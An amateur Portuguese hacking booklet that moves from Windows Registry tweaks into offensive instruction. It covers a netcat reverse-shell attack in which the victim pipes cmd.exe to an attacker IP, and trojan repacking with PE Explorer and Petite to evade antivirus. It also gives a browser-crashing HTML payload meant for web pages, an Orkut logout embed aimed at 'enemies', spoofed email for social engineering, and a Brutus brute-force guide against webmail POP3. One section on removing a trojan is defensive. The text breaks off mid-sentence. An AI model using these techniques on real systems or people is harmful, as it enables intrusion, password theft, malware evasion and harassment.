Escolar Documentos
Profissional Documentos
Cultura Documentos
Bom chegando a terceira apostila, com enorme sucesso das outras duas eu estou nessa agora!!!Em outra jornada pelo Windows.Ento agora nessa verso das "apostila de Nlio Jaloto" eu estarei falando do Editor de Registro uma grande faixa de vulnerabilidade esta consentrada ai, e si voc quer mesmo si especializar na segurana de software o editor de regidtro vai te dar muitas ideias e boms trabalho para voc fazer e aprender cada vez mas na rea da segurana...Aqui nessa apostila vai ter varios tipos de dicas desde a criativa at a marvada. Meu nome Nlio De Jesus Jaloto, moro me Tres Rios, tenho 17 anos, amo a internet e a computaao em geral, sou pesquisador amador na rea, no fiz e nem penso em fazer ciencia da computao. Meu e-mail nelio_jaloto@hotmail.com, ou no orkut http://www.orkut.com/Profile.aspx?uid=16422751250869153531, .Dvidas e sugestes, vontade. bla bla bla bla bla........ chega de enrolaao agora vamos para pratica que trabalhar muito bom !!!Alguma ferramentas de busca tambem pode ser usado junto a apostila como o www.google.com.br ou ento o www.yahoo.com.br como vocs podem ir vendo essa apostila eu nao fiz o indice, para deixar todos na curiosidades heheehe... H essa apostila totalmente Gratuita ento qualquer que seje o site ou pelo e-mail que voc disponibilizou essa apotila ela tem que ser completamente gratuita ok....caso contrario queira me comunicar pelo meu e-mail, ou pelo orkut, ou ento v a qualquer agencia do procom hehehe...brincadeira
Editor do Registro
O Editor do Registro uma ferramenta avanada para exibir e alterar as configuraes no Registro do sistema, e que contm informaes sobre como o computador deve funcionar. O Windows armazena suas informaes de configurao em um banco de dados (o Registro) que est organizado em um formato de rvore. Embora o Editor do Registro permita que voc inspecione e modifique o Registro, geralmente no necessrio faz-lo. Alteraes incorretas podem danificar o sistema. Um usurio avanado que esteja preparado para editar e restaurar o Registro pode usar o Editor do Registro com segurana para executar tarefas, como, por exemplo, eliminar entradas duplicadas ou excluir entradas de programas que foram desinstalados ou excludos.
Pasta/chave predefinida
HKEY_CURRENT_USER
Descrio
Contm a base das informaes de configurao para o usurio que estiver conectado no momento. As configuraes de pastas, de cores de tela e do Painel de controle do usurio so armazenadas aqui. Essas informaes so chamadas de perfil do usurio. Contm a base de todos os perfis do usurio no computador. HKEY_CURRENT_USER uma subchave de HKEY_USERS.
HKEY_USERS
Contm informaes de configuraes especficas do computador (para qualquer usurio). uma subchave de HKEY_LOCAL_MACHINE\Software. As informaes armazenadas aqui garantem que o programa correto ser aberto quando voc abrir um arquivo usando o Windows Explorer. Contm informaes sobre o perfil de hardware usado pelo computador local na inicializao do sistema.
A tabela a seguir lista os tipos de dados definidos no momento e usados pelo sistema.
Tipo de dados REG_BINARY REG_DWORD Descrio Dados binrios no processados. As informaes dos componentes de hardware, em sua maioria, so armazenadas como dados binrios e exibidas em formato hexadecimal no Editor do Registro. Os dados representados por um nmero com 4 bytes. Vrios parmetros para drivers de dispositivos e servios so desse tipo e esto exibidos em formato binrio, hexadecimal ou decimal no Editor do Registro Uma seqncia de dados de comprimento variado. Esse tipo de dado inclui variveis que so resolvidas quando um programa ou servio usa os dados. Uma seqncia mltipla. Esse tipo representado geralmente por valores que contm listas ou valores mltiplos em um formato que as pessoas podem ler. As entradas so separadas por espaos, vrgulas ou outras marcas. Uma seqncia de texto de comprimento fixo. Uma srie de matrizes aninhadas criadas para armazenar uma lista de recursos para um componente de hardware ou driver.
REG_EXPAND_SZ REG_MULTI_SZ
REG_SZ REG_FULL_RESOURCE_DESCRIPTOR
Cuidado
A edio incorreta do Registro pode danificar gravemente o sistema. Antes de alter-lo, faa backup dos dados importantes contidos no computador.
Observaes
Para abrir o Editor do Registro, clique em Iniciar, clique em Executar, digite regedit e clique em OK. Para usar o Editor do Registro com segurana para executar tarefas como eliminar entradas duplicadas ou excluir entradas para programas que foram desinstalado sou excludos, prepare-se para editar e restaurar o Registro.
Prticas recomendadas
No Windows, as informaes de configurao do sistema esto localizadas e centralizadas no Registro. Embora isso simplifique a administrao de um computador ou de uma rede, uma edio incorreta do Registro pode desativar o sistema operacional. A lista a seguir fornece algumas opes melhores para voc usar o Registro e o Editor do Registro de forma segura: Antes de alterar o Registro, faa uma cpia de backup. Para isso, voc pode usar um programa como o Backup(que eu irei logo falar dele ai em baixo.). Aps fazer alteraes no Registro, crie um disco de recuperao automatizada do sistema (ASR). Com a finalidade de solucionar problemas, guarde uma lista das alteraes efetuadas no Registro. Para obter mais informaes, consulte Dados do estado do sistema. No substitua o Registro do Windows pelo Registro de outras verses de sistemas operacionais Windows ou Windows NT. Nunca permita que o Editor do Registro seja executado em modo autnomo.
Antes de comear a detalhar as suas principais funes, precisamos saber como executar o Regedit. Isso possvel, de maneira geral, utilizando uma das duas alternativas abaixo: Atravs do menu Iniciar :
* Clique no boto INICIAR e selecione a opo EXECUTAR . * No campo Abrir digite Regedi * Tecle Enter
(j pensou fazer isso no computador da escola ou da lan house?!?!?) Se voc instalou um daqueles CD de brinde de algumas provedoras de acesso internet, pode ser que a barra de topo do seu Internet Explorer foi alterada, tipo UOL ou AOL. Mas tambm pode ser que voc queira mudar essa frase para refletir o seu modo de ser, ou mesmo que aparea o seu nome nessa barra. Qualquer que seja a sua razo a nossa Dica Prtica resolve isso facilmente: Clique em INICIAR > EXECUTAR; Digite REGEDIT e pressione a tecla [ENTER]; No painel esquerdo do Editor de Registro abra as chaves at encontrar: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main No painel direito selecione a sub-chave Window Title (ou crie essa chave) D um duplo clique nessa chave e altere-a conforme a sua necessidade; por exemplo: "::DICAS::" (sem as aspas) Para sair e salvar as alteraes no REGISTRO, clique o boto de fechar a janela do Editor de Registro. Para confirmar que a alterao ficou conforme o desejado basta abrir novamente seu Internet Explorer e verificar se ele acessou diretamente a pgina desejada.
Que tal uma mensagem sua avisando aos curiosos antes de iniciar o Windows?!
Por Nlio Jaloto isso mesmo voc pode colocar uma mensagem para avisar outras pessoal o que pode acontecer si elas utilizar o seu computador. Eu coloquei "Esse computador esta sendo monitorado por min pela internet...Se voc no souber a senha, no perca tempo tentando descobrir, por que voc no vai conseguir,obrigado pela cooperao,favor desligar caso no saiba a senha...Obrigado...Desde j Nlio Jaloto!!!" Vamos la com o editor de registro aberto v em : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Depois disso procure pela sub-chave LegalNoticeCaption onde vai ficar o titulo, coloque o que quiser, (eu coloquei "Atenao")na mensagem e depois por "LegalNoticeText" onde vai ficar o seu aviso expresse sua raiva ai pessoal rsrsrsrs...afinal o computador seu nao dos curiosos ehehehe...
bom na imagem ai em cima eu capturei a imagem da tela de boas vindas do Windows e no fotoshop e editei ela...No computador o que vale a criatividade no ?!?! Quer deixar o seu papel dee parede na tela de logon do Windows 2000, XP(no modo clssico) ou Server 2003? Exixtem programinhas que permitem fazer isso, que geralmante editam o registro pra voc...Mas h quem goste de editar o registro (pro isso essa dica esta na minha apostila) diretamente...Entao vamos l, sem enrolao: Inicair > executar > regedit HKEY_USERS\.DEFAULT\Control Panel\Desktop No item "Wallpaper"(se no tiver essa sub-chave favor cria-l), coloque o caminho completo da imagem, que DEVE ser BITMAP. recomendavel deixala com o tamanho da resoluao do seu monitor...No use aspas no caminho. Assim voc pode deixar o logo da sua empresa, uma mensagem pra quem ligar o seu computador, a foto da sua namorada, etc... Ah basta fazer logoff Dica para ir aprendendo:Na chave ".DEFAULT" do registro, voc pode alterar diversas coisas relativas ao usurios "padrao" do Windows, que uma conta especial, que no pode "efetuar logon" local, mas usada quando nehum usurio est logado (por ex:, ao iniciar o computador , ao fazer logoff e at mesmo durante a instalao do Windows, no modo grafico, quando as contas de usurios ainda nem sonham em ser criadas). O que voc altera aqui no afeta as contas usurios atuais do computador.
Se voc quiser esconder alguma partiao, no prescisa usar necessariamente um programa...O prorprio Windows possui essa configurao, mas no existe atravs de interface grafica.Salve o REGEDIT! E ainda pode negar acesso a ela, bloqueando uma unidade inteira (explico isso logo mais abaixo, voc precisara usar nenhum programa de terceiros) Estando oculta, o acesso a unidade no negado, mas ela no aparecer mais na listagem de unidades no "meu computador", no "ambiente de redes" nem nas janelas do Explorer em geral. Assim usurios e bisbilhoteiros mais simples no acessaro (s de digitarem a letra delas no "iniciar > Executar" ou na barra de endereo, por exemplo)
Vamos l...O caminho: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer No valor DWORD "NoDrives" (sem aspas, se no tiver,crie nessa mesma chave) O valor dever ser nmero DECIMAL, uma somatoria usando o padrao: A= 1 B=2 C=4 D=8 E=16 F=32 G=64 etc... Por ex:, para esconder a unidade "C", deixe o valor 4. Para esconder os drives "D e E", use 24. Isso por que: 8 + 16 = 24 o 8 esconde o "D" e o 16 o "E". Nota: essa configuraao independe para cada conta de usuario na maquina. Ou seja ao se logar com uma conta sem essa configurao, as unidades estarao sendo exibidas normalmente. No Windows 2000/Me ou superior possivel Negar acesso a determinada unidade. Basta fazer a mesma coisa, mas no valor "NoViewOnDrive". Qualquer um podera altera o registro e reverter isso, mas para a grande esmagadora maioria dos usurios, a proteo ser suficiente!
Documentos compartilhados
Por Nlio Jaloto Se voc no est em uma rede e no deseja que a pasta Documentos Compartilhados aparea em Meu Computador, siga os seguintes passos para remov-la: Clique em INICIAR > EXECUTAR; Digite REGEDIT e pressione a tecla [ENTER]; No painel esquerdo do Editor de Registro abra as chaves at encontrar: HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Clique com o boto direito do mouse num espao vazio do lado direito e selecione Novo > Valor DWORD Nome do novo valor: NoSharedDocuments D dois cliques no novo valor e no campo Dados do Valor coloque 1. Se quiser voltar atrs, mude o valor para 0 no Value data ou apague NoSharedDocuments Value.
Por Nlio Jaloto Clique em INICIAR > EXECUTAR; Digite REGEDIT e pressione a tecla [ENTER]; No painel esquerdo do Editor de Registro abra as chaves at encontrar: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider Depois seleccionar ServiceProvider e alterar os valores hexadecimais: Class = 1 DnsPriority = 7 HostsPriority = 6 LocalPriority = 5 NetbtPriority = 8
Diminuir o tempo de encerramento do Windows (fechando automaticamente os programas que deixam de responder):
por Nlio Jaloto Clique em INICIAR > EXECUTAR; Digite REGEDIT e pressione a tecla [ENTER]; No painel esquerdo do Editor de Registro abra as chaves at encontrar: HKEY_USERS\.DEFAULT\Control Panel\Desktop Depois seleccionar AutoEndTasks e trocar o 0 desliga e por um 1 liga.
Acelarar a navegao em pastas desactivando a procura automtica de ficheiros e impressoras de rede(para quem no utiliza rede):
por Nlio Jaloto meu computador > Ferramentas > Opes de pastas > modo de exibiao e depois la em baixo, desmarcar a opo que diz: Procurar automaticamente pastas e impressoras de rede. proto. voc vera que ficara mais rapido a navegaao nas suas patas
A descrio a partir daqui foi retirada do Baixaki: Voc j deve ter notado que ao comprar um computador novo ou aps reinstalar o Windows , o desempenho dele surpreendentemente alto. Todavia, conforme o passar do tempo, de se perceber que os programas j no so executados to rapidamente quanto antes, o sistema passa a demorar um pouco mais a ser carregado e alguns sintomas de instabilidade acabam surgindo. Para que essa queda de eficincia no ocorra, ou que seja a menos percebida possvel, necessria a realizao de manutenes peridicas no sistema. Mas no pense que essa manuteno limita-se apenas a remoo de arquivos desnecessrios! So vrios os fatores que, de certa forma, contribuem para a famosa lentido, tais como a fragmentao do registro do sistema, excesso de aplicaes carregadas juntamente com o Windows e assim por diante. Tendo em vista lhe auxiliar no ajuste desses itens, o Glary Utilities rene todas as ferramentas das que precisa para minimizar os efeitos negativos gerados pelo uso constante do computador. Com visual agradvel e interface intuitiva, o programa possibilita que qualquer usurio o utilize sem maiores dificuldades, desde que possua plena conscincia do que ir fazer. Limpeza A primeira etapa a ser executada para comear a aperfeioar o PC a remoo das coisas inteis. Assim como um carro de corrida, devemos eliminar tudo o que desnecessrio em busca de um melhor desempenho. Em outras palavras: menor peso, maior velocidade. Para acessar essa funo, basta clicar sobre o boto Limpar & Reparar. Arquivos desnecessrios Estes so a parte grossa dos fatores que ocasionam a lentido do sistema. Clicando na opo Selecionar Driver(s), voc faz com que o Glary Utilities busque por arquivos que s esto ocupando espao em disco, entre eles os temporrios, os removidos para a lixeira e aqueles que no
possuem sequer contedo, de tamanho zero. Em seguida, um relatrio simplificado exibido para que voc fique a par do que est prestes a ser apagado do sistema. Os arquivos temporrios e os sem contedo, em especial, fornecem a opo de realizar uma cpia de segurana (backup) previamente remoo e podem ser recuperados em Restaure, localizado na aba Mais opes. Tambm nesta aba, possvel remover componentes do Windows em desuso manualmente. Limpando o registro O uso contnuo do computador faz com que o registro do sistema fique abarrotado de entradas, principalmente se voc gosta de instalar e desinstalar programas freqentemente. Como conseqncia, a execuo dos programas torna-se nitidamente mais demorada, muitas vezes chegando ao ponto de surgirem falhas e os famosos travamentos. A ao do Glary Utilities nesta rea simples: localizar e corrigir todas as entradas invlidas. O registro do sistema uma parte bastante delicada do computador. Portanto, s efetue os devidos ajustes se voc estiver completamente certo do que est fazendo. Caso contrrio, voc poder excluir valores importantes e inutilizar o sistema. Para sua segurana, um backup automtico criado antes de qualquer ao e se por ventura as alteraes gerarem problemas em alguma aplicao, clique em Restaurar Registro para recuperar os dados. Corrigindo atalhos A opo Shortcuts Fixer uma ferramenta muito til para a remoo de atalhos do Menu Iniciar sem arquivos de referncia ou vazios. Tal problema gerado principalmente por desinstaladores ineficientes que no removem os atalhos criados na instalao dos seus respectivos softwares. Quando se tem muitos programas instalados no PC, vale a pena verificar se no h nada poluindo o seu menu de atalhos. Desinstalando programas No h nenhuma novidade nesta funo. Ela apenas uma alternativa para o Adicionar e Remover Programas do Windows com algumas modificaes sutis. Nela, basta identificar os programas que no so utilizados e desinstal-los do computador. Caso o programa selecionado j tenha sido apagado, voc pode excluir a entrada dele pelo boto Remover Entrada no alto da janela. Otimizao A segunda parte da manuteno do computador est na otimizao dos arquivos nele existentes. Essa melhora pode ser obtida atravs de pequenas mudanas que parecem sem importncia, mas na realidade surtem grande efeito sobre o desempenho do sistema como um todo. Inicializao do Windows O problema mais comum encontrado em computadores com muitos programas a demora para carregar o sistema. Isso ocorre devido a grande quantidade de aplicativos que so executados automaticamente assim que o Windows iniciado. um incmodo fcil de resolver: clique na opo Gerenciador de Inicializao e desmarque os itens que no possuem necessidade de serem executados automaticamente. Se antes voc podia tomar um caf enquanto o computador era ligado, agora no ter tempo nem de sair da frente dele! Otimizao da memria Trata-se da otimizao do funcionamento do sistema a curto prazo, ou seja, os resultados so percebidos em imediato. Esse recurso essencial para quem utiliza o PC por muito tempo ininterruptamente e imprescindvel para quem possui pouca memria RAM. Neste item, o Glary Utilities simplesmente reorganiza os dados na memria de modo eficiente para facilitar o acesso eles pelo sistema. Alm disso, elimina os "restos" de dados encontrados, aumentando a quantidade de memria RAM disponvel. Menu Contexto Essa uma opo original, dificilmente encontrada em softwares da mesma categoria. No item Context Menu Manager, voc gerencia os itens que deseja apresentar nos menus de contexto do Windows. No sabe o que um menu de contexto? Pois bem, menu de contexto aquela lista de opes exibida depois que voc clica com o boto direito do mouse sobre um arquivo, pasta, atalho etc. As opes padres do sistema no podem ser alteradas, apenas as adicionadas por outros programas so exibidas para modificaes. Privacidade e segurana J que voc est limpando o computador, por que no aproveitar para apagar tambm dados pessoais registrados no sistema? Este recurso serve mais para fins de administrao do sistema, um adicional para voc deixar a sua mquina em perfeito estado. Eliminando vestgios muito comum o compartilhamento de um mesmo computador entre vrias pessoas e no h problema algum nisso, a no ser que duas ou mais pessoas decidam utiliz-lo no mesmo instante. Com isso, essencial que cada usurio preserve as suas informaes pessoais, do contrrio, o sistema ficaria uma baguna e eles estariam suscetveis a invases de privacidade. No item Tracks Eraser, o Glary Utilities possibilita que voc apague todos os seus rastros do computador rapidamente. A quantidade de opes vasta, entre elas esto: histricos, cookies, programas acessados e muito mais. Deletando de verdade Algumas vezes, por um motivo qualquer, precisamos apagar um arquivo definitivamente do computador, tornando impossvel a recuperao dele por softwares especializados. Para isso, o programa oferece a opo File Shredder, onde voc pode apagar arquivos e pastas para sempre do computador, sem chances de recuper-los novamente. Reconfigure o Internet Explorer A opo Internet Explorer Assistant um pequeno adicional do Glary Utilities para ajustar itens mais avanados do navegador Internet Explorer. Nela voc define desde as configuraes dos plugins instalados nele at as pginas a serem acessadas nas situaes de um erro ou qualquer outro caso especfico do navegador. Usurios mais avanados podem livrar-se facilmente de hijacks com este recurso. Codifique seus arquivos H algo muito importante a preservar no computador, mas que no pode ser acessado por outra pessoa? Ento codifique o arquivo de maneira que s voc possa acessar o contedo dele. Em File Encrypter and Decrypter, possvel criptografar qualquer arquivo rapidamente com o uso de senha, a qual deve ser utilizada na hora de efetuar a operao inversa. Simples, porm muito eficaz. Arquivos e diretrios Essa seo serve para gerenciar e organizar os arquivos e pastas existentes no computador. Com o Glary Utilities, voc possui uma forma prtica de manter o controle sobre todo o contedo do sistema.
Anlise de disco Como o prprio nome sugere, esse recurso analisa o disco rgido para lhe informar sobre como ele est ocupado. Percentagem de arquivos de um determinado formato, quantidade de arquivos e espao ocupado por pastas especficas so algumas dos dados que voc ter aps a anlise. Arquivos duplicados Uma ferramenta muito til para encontrar e remover arquivos repetidos desnecessariamente. Tome muito cuidado, pois alguns arquivos precisam ter cpias instaladas em pastas diferentes para que os programas que os originaram funcionem corretamente. Portanto, s remova se estiver certo de que o arquivo em questo desnecessrio. Pastas vazias Em Empty Folder Finder, o programa localiza e apaga todas as pastas vazias do sistema. J que pastas vazias no ocupam espao, esta funo serve apenas para fins de organizao. Dividindo arquivos Outra funo adicional File Splitter and Joiner, com a finalidade de dividir arquivos relativamente grandes em partes menores. Alm de permitir a personalizao do tamanho dos "pedaos", h tambm valores predefinidos para facilitar o seu trabalho, como o tamanho de um CD, DVD etc. Para reunir as partes, posteriormente, basta acessar a aba Join file no topo da tela. Ferramentas do sistema Essa uma rea um pouco mais avanada do programa, recomendada para quem entende do assunto. Nela, voc pode gerenciar todos os processos em execuo no computador Gerenciador de Processos e acessar rapidamente as ferramentas padro do Windows Windows Standard Tools , tais como desfragmentador de disco e restaurao do sistema. MANUTENO COMPLETA O Glary Utilities d um show em seus concorrentes! Sua vasta quantidade de ferramentas permite deixar o computador impecvel com apenas um software, rapidamente e de modo eficiente. Baixe agora e comprove, ou vai dizer que est contente com a lentido do seu sistema? Download: www.baixaki.ig.com.br/download/Glary-Utilities.htm
Quer travar o IE? Use esse bug bobinho, que ele fecha na hora!
por Marcos Elias Quer travar o IE? Coloque isso numa pgina HTML, e abra no Internet Explorer: <style>*{position:relative}</style><table><input></table> Pronto! Ao usar algum programa do Windows que use a DLL "shlwapi.dll", o programa executar uma operao ilegal e ser fechado... Seja o IE, Outlook, FrontPage ou outros. Legal, neah? Bom pra colocar na pgina inicial do seu site, num movimento "anti-IE". Antes, exiba um alert('Navegue melhor, use o Firefox!');window.open ('http://www.mozilla.org/products/firefox'); Hahaha. Zueira essa parte, viuh?
FPORT - Um programa que consegue mapear as portas abertas no seu computador para processos, mostrando assim que programa abriu cada porta. REGEDIT- Editor do registro que vm junto com o Windows. Primeiro usaremos a opo de scanneamento do Valhala no nosso prprio computador, usando o endereo de loopback (127.0.0.1) e selecionando Scanneamento inteligente, para que o programa cheque as portas cadastrados em sua lista:
Encontramos vrias portas abertas. Vamos checar ento: meu sistema operacional Windows XP e o utilizo como servidor. S de ter essa informao j posso excluir vrias portas: a porta 25, que meu servidor de envio de e-mail, a porta 110, que meu servidor de recebimento de e-mails, a porta 135 que o RPC (remote procedure call), a porta 389 do LDAP, a 1025 do Listen e a 5000 (mesmo mostrando acima que podem existir trojans que a utilizem) usada pelo Universal Plug n Play. Ora, sobrou apenas a porta 666 (que o trojan servercompress.exe da matria anterior abriu). Obs: So todas portas TCP. No computador de um usurio comum que utilize Windows 98 por exemplo, apareceram bem menos portas. Geralmente comum as porta 139 (Netbios), 445 (Netbios por TCP/IP) estarem abertas (o que pode significar outro risco, leia a matria sobre o r3x e o languard), e as portas de 1000 a 4000, quando voc est utilizando programas como ICQ e Internet Explorer. Para fazer esse teste, esteja desconectado para que no tenha muitas portas abertas para confundir. Vamos rodar o FPORT em modo DOS e ver suas informaes:
Ah ! Descobri o safado. Observe que o Fport mostrou que o programa c:\windows\system32\servercompress.exe abriu e est usando a porta 666. Esse outro svchost.exe apenas um servio do Windows XP, no um trojan. Muito bem: descoberto o nome do arquivo como vamos fazer para mand-lo para o espao? No apagar o arquivo de cara, pois como ele est sendo executado o Windows no permitir. Eu poderia tambm procurar o nome do arquivo nos processos que esto sendo executados e fechar o processo, mas o trojan continuaria sendo iniciado pois ele est no registro. Vamos executar o regedit ento (iniciar / executar / digite regedit) e mandar que ele procure por servercompress.exe.
Prontinho, procuramos e apagamos todas as chaves que apareceram no resultado. Logo aps reiniciamos o computador, e o trojan no estar mais na memria. Agora s ir e apagar o arquivo servercompress.exe . E assim retiramos esse programa maldoso da mquina.
Dicas de invaso!!!
Por Marcos Assuno Normalmente, quando um invasor instala um trojan ou um backdoor (porta dos fundos) em uma mquina, ele utiliza o clssico modo clienteservidor. O software abre uma porta na mquina alvo, e o invasor precisa saber o endereo ip dessa mquina para poder se conectar a ela. Mas e quando no possvel que o invasor saiba o endereo ip, ou melhor ainda, se essa mquina estiver dentro de uma rede interna (intranet) com um endereo ip privado? Ex: 192.168.0.2. O invasor nunca poderia utilizar esse ip para se conectar. Como ele poderia fazer ento? Ele teria que utilizar o conceito de conexo reversa. Em vez de se conectar ao alvo, fazer o alvo se conectar de volta ao invasor. Isso possui vrias vantagens: - Para mltiplos alvos, no h necessidade de saber os endereos ips. - Qualquer computador dentro de uma rede interna pode ser alvo (mesmo os que acessam via proxy) - Esse tipo de ataque consegue burlar a maioria das configuraes de firewall Para exemplificar, vamos utilizar o programa NETCAT (o famoso canivete suo do TCP/IP) para realizar uma conexo reversa simples. Primeiro, damos uma olhada geral nas suas opes:
Podemos ver que o programa possui muitas funes diferentes, e pode agir tanto como cliente (como uma espcie de super-telnet) quanto como servidor. Para nosso ataque funcionar, vamos precisar abrir dois prompts de comando, e digitar o seguinte:
Em cada uma das janelas, pedimos ao NETCAT (comando nc) que escute ( -L ) em uma determinada porta ( p ), s mostre conexes em formato numrico ( -n ) e nos mostre todo tipo de trfego que passar por essa porta ( -vv). Estando ento agindo como servidor, abrimos as portas 53 e 79 no nosso sistema (lembra que somos o invasor?). Agora, como faremos para o sistema alvo se conectar de volta ao nosso ip? Enviamos via bat, ou executamos via active x em alguma pgina, mtodos existem muitos... o que ter de ser feito o seguinte:
Est vendo esse smbolo ( | )? Ns o chamamos de pipe... ele serve para concatenar a sada de um comando para a entrada de outro. No exemplo acima, eu fiz o seguinte... Conecte-se ao endereo ip 200.97.69.233 na porta 53, concatene a sada para o programa cmd.exe e envie o resultado dessa sada para uma conexo feita ao ip 200.97.69.233 na porta 79. Em sistemas Linux/Unix, basta trocar o cmd.exe por /bin/sh (o interpretador de comandos). O que ns fizemos foi: o sistema alvo vai se conectar na minha porta 53, capturar o que eu digitar, processar pelo seu interpretador de comandos e enviar o resultado para uma conexo na minha porta 79. Teoricamente ento, quando eu digitar o comando dir na minha janela de comandos que est monitorando a porta 53, vou ver o resultado do comando na janela da porta 79. Complicado? Nem tanto... vamos ver o resultado
Pronto, digitei alguns comandos na primeira janela e recebi o resultado na Segunda. Com isso, conseguimos realizar a conexo reversa. Se voc desanimou por achar muito trabalhoso, eu tenho uma boa notcia. Alguns trojans grficos j conseguem realizar conexo reversa (entre outras coisas fantsticas que abordaremos em outras matrias). Um desses o Beast, demonstrado na imagem abaixo.
Essas bolhas verdes na verdade so conexes reversas sendo realizadas. Na verso definitiva, as bolhas foram trocadas por Ets, mas o princpio o mesmo.
voc fazer isso. Qual o perigo disso? Bom, dizem que uma imagem vale mais que mil palavras... observe a imagem abaixo:
Utilizando como teste um site de e-mails annimos (fake mails), eu enviei uma mensagem para meu e-mail, como se viesse de president at whitehouse.gov, com o nome de George W. Bush. Muita gente pode pensar: ah, mas isso como mandar um carto, voc coloca o e-mail que quiser... no bem assim... a mensagem vai chegar como se fosse enviada normalmente, pelo outlook por exemplo. Vamos observar o e-mail depois que ele chegou na minha caixa postal.
O e-mail chegou, e o nome pelo menos o que colocamos. Mas e qual o endereo do e-mail enviado? Vamos dar uma olhada em propriedades.
Prontinho. Objetivo completado. Acabei de receber um e-mail do presidente dos Estados Unidos. Agora imagine o impacto do fake mail em empresas e negcios em geral. muito comum a engenharia social ser usada nesse aspecto. Manda-se um e-mail a vrios usurios de um provedor como se fosse do suporte (geralmente suporte do provedor.com.br) com uma mensagem muito convincente, pedindo-os para mudar sua senha de acesso para uma senha padro, como : abc1234. Claro que muitos no cairo... mas a grande maioria vai cair. Como evitar esse problema? Com bom senso... se receber um e-mail pedindo alguma coisa importante, responda e confirme se aquele e-mail foi realmente enviado pelo seu dono. Precauo nunca demais no perigoso jogo da Internet.
O Anti-Vrus encontrou o trojan. Reclamou de infeco encontrada e o apagou. Sorte que fiz uma cpia dele. Vamos dar uma olhada na estrutura do Server.exe . Para isso usarei o excelente PE Explorer ou Resource Hacker(Falei dele na minha primeira apostila!), ambos podem ser conseguidos em http://www.heaventools.com . Esses softwares permitem que eu enxergue o que existe dentro do arquivo binrio e consiga at manipular alguns dados.
Usando o PE Explorer ento, vou apagar todas as imagens existentes dentro do Server (bitmaps e cursores), todas as janelas de dilogo que ele possa ter, modificarei algumas strings e um pouco do cdigo em Pascal (como o nome dos componentes e seu caption). Poxa consigo fazer tudo isso com esse programa? Sim, consegue. Mesmo aps retirarmos todo esse lixo, o programa ainda roda. Est na hora do segundo tratamento dado ao Server, comprimir o seu tamanho usando o programa Petite http://www.un4seen.com/petite/ .
Bom, mandei comprimir o programa e ele ficou com cerca de 30 a 50% maior do que seu tamanho original. No, essa no uma compresso do tipo ZIP ou coisa do gnero. O Petite praticamente realoca o arquivo, tornando-o totalmente diferente do que era antes... mas ainda funcional. Salvamos o novo arquivo comprimido como servercompress.exe . Vamos repassar o Norton 2003 para vermos agora :
Prontinho. O anti-vrus no encontrou nenhuma infeco. Isso porqu o antivirus procura padres conhecidos de vrus e trojans nos arquivos. como se ele olhasse uma foto e procurasse por ela dentro de arquivos. Como ns modificamos muito a nossa foto original, o programa no detectou nada. Os cavalos de tria de hoje conseguem at barrar firewalls como Zone Alarm. Como ? Eles possui um pequeno banco de dados com o nome de processos de programas comumente usados como Zone Alarm, Norton Internet Security, Tiny Firewall, etc. Antes do trojan tentar abrir a porta e o firewall detectar, ele procura entre os processos que esto sendo executados no computador aqueles que esto na sua lista. Se encontrar algum deles, o trojan os fecha (claro que o trojan precisa ter permisso para isso, mas na maioria dos usurios comuns isso vai acontecer) e pode at substituir o cone da barra de tarefas por um falso, exatamente igual ao do firewall que ele acabou de fechar. Citarei outras tcnicas em outras matrias futuramente.
Teu amigo entra para ver os recado no orkut quando ele clik em qualquer coisa ele sai do orkut!!!
Por Nlio Jaloto isso mesmo um HTML que quando voc manda para aguma contato seu no orkut pelo recado ele sai imediatamente, indo parar na pagina inicial do orkut, ja perdir muitas amizade por isso rsrssr... E so mandar um recado para o seu inimigo assim: <embed src="http://www.orkut.com/GLogin.aspx?cmd=logout"> ai se alguem entrar na pagina de recados de quem vc enviou vai sai do orkut, isso serve para todos!!!
Brutus!!!
Por Marcos Assuno Atendendo a pedidos, refiz a matria sobre o software Brutus, que consegue descobrir senhas pela tcnica da fora-bruta. Isso significa que ele tenta vrias senhas antes de acertar. Pode-se que nunca acerte (no caso de pessoas que tem senhas muito complicadas, misturando letras maisculas, minsculas e nmeros...) ou que demore dias, at semanas para se descobrir uma senha mais fcil (dependendo do seu tamanho). Tenha em mente que a chance de se descobrir uma senha por esse mtodo de 30%. Voc depender da sorte. A tela principal do Brutus:
Vou explicar passo a passo todas as sesses do programa que voc v acima. Assim ficar mais fcil utiliz-lo e voc compreender melhor o seu funcionamento. Target Aqui voc coloca o endereo de onde voc vai descobrir a senha. Isso pode ser muito varivel. Por exemplo, se voc for descobrir uma senha de HTTP FORM (visto depois), no adianta s voc colocar www.site.com , voc teria que colocar o caminho inteiro do formulrio. Isso poderia ser complicado para algumas pessoas. Caso esteja tentando descobrir uma senha de ftp ou pop3 por exemplo, s colocar o endereo do site na maioria das vezes. Type Esse o mais importante de todos. Voc vai definir que tipo de senha quer descobrir. Os tipos so: - HTTP Basic Auth - HTTP Form - FTP - POP3 - TELNET - SMB (Netbios) - Custom Vamos ver um a um HTTP Basic Auth Esse utilizado para se descobrir senhas de autenticao bsica em pginas web (no baseadas em formulrios). HTTP Form Para descoberta de senhas que utilizam formulrios. Ex: e-mails de Yahoo e Hotmail. FTP Descobrir senhas de servidores ftp, utilizados para transferncia de arquivos. POP3 Esse importante. utilizado para o recebimento de e-mails atravs de programas prprios. Atravs dele voc senhas de e-mails muito mais rapidamente que utilizando HTTP Form. Por exemplo: Eu quero descobrir uma senha do Yahoo. Mas o yahoo.com.br permite que voc use um servidor POP3 para ler os e-mails atravs do seu outlook ou outro programa qualquer. Se eu utilizasse HTTP Form, demoraria muito tempo para descobrir... algo como 1 ou 2 tentativas por segundo. Mas se eu tentar o endereo pop.mail.yahoo.com.br, que o endereo POP3 para recebimento de e-mails do Yahoo (cada provedor / site tem o seu... procure saber qual ) vou conseguir aumentar a velocidade para 12 ou 13 tentativas por segundo. TELNET Utilizado para descobrir senhas de sistemas remotos que aceitam conexo via telnet (porta 23). Por exemplo, um sistema Linux ou Unix. SMB (Netbios) Senhas para acesso sistemas Windows por compartilhamento de arquivos. CUSTOM Voc pode customizar como quiser. Depois temos os botes Start (iniciar), Stop (parar) e Clear (limpar) Port Porta do servio que voc vai utilizar para descobrir a senha. Geralmente no precisa mexer, quando voc 